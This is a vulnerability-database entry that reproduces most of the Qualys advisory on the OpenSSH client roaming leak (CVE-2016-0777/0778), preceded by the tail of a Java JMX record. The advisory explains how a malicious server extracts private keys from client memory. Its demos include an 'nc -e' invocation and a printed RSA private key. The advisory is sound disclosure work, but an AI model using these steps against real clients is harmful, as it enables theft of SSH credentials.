0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1533.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3342.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0426.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1718" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-3143.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0440.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1531" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1725.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2417.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0445.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2394.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1682.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5071" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1713" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2430.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5072" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0442.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-0551.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0424.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1682" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2012-1719.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1486.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1721" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2384.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0169.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-3159" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0438.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-5073" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-1478.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0435.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-0434.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2420.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2013-2440.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2473" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2433" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2400" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2462" } ], "sources": [ { "db": "VULMON", "id": "CVE-2013-2457" }, { "db": "BID", "id": "60632" }, { "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122084" }, { "db": "PACKETSTORM", "id": "122651" }, { "db": "NVD", "id": "CVE-2013-2457" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2013-2457" }, { "db": "BID", "id": "60632" }, { "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "db": "PACKETSTORM", "id": "122422" }, { "db": "PACKETSTORM", "id": "122423" }, { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "126195" }, { "db": "PACKETSTORM", "id": "123735" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122653" }, { "db": "PACKETSTORM", "id": "122084" }, { "db": "PACKETSTORM", "id": "122651" }, { "db": "NVD", "id": "CVE-2013-2457" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-06-18T00:00:00", "db": "VULMON", "id": "CVE-2013-2457" }, { "date": "2013-06-18T00:00:00", "db": "BID", "id": "60632" }, { "date": "2013-06-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "date": "2013-07-16T03:45:16", "db": "PACKETSTORM", "id": "122422" }, { "date": "2013-07-16T03:46:50", "db": "PACKETSTORM", "id": "122423" }, { "date": "2013-06-20T00:48:07", "db": "PACKETSTORM", "id": "122085" }, { "date": "2014-04-17T22:01:36", "db": "PACKETSTORM", "id": "126195" }, { "date": "2013-10-23T22:58:21", "db": "PACKETSTORM", "id": "123735" }, { "date": "2013-07-03T19:05:30", "db": "PACKETSTORM", "id": "122273" }, { "date": "2013-06-27T22:37:01", "db": "PACKETSTORM", "id": "122189" }, { "date": "2013-08-02T15:12:49", "db": "PACKETSTORM", "id": "122653" }, { "date": "2013-06-20T00:47:46", "db": "PACKETSTORM", "id": "122084" }, { "date": "2013-08-02T15:05:49", "db": "PACKETSTORM", "id": "122651" }, { "date": "2013-06-18T22:55:02.653000", "db": "NVD", "id": "CVE-2013-2457" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-01-05T00:00:00", "db": "VULMON", "id": "CVE-2013-2457" }, { "date": "2017-08-22T14:11:00", "db": "BID", "id": "60632" }, { "date": "2015-03-18T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003054" }, { "date": "2022-05-13T14:52:54.773000", "db": "NVD", "id": "CVE-2013-2457" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "network", "sources": [ { "db": "BID", "id": "60632" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE of Java Runtime Environment In JMX Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003054" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "overflow, arbitrary", "sources": [ { "db": "PACKETSTORM", "id": "122085" }, { "db": "PACKETSTORM", "id": "122273" }, { "db": "PACKETSTORM", "id": "122189" }, { "db": "PACKETSTORM", "id": "122084" } ], "trust": 0.4 } }
var-201601-0029
Vulnerability from variot
The resend_bytes function in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2 allows remote servers to obtain sensitive information from process memory by requesting transmission of an entire buffer, as demonstrated by reading a private key. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. Successfully exploiting this issue allows attackers to obtain sensitive information that may aid in further attacks. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd
"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
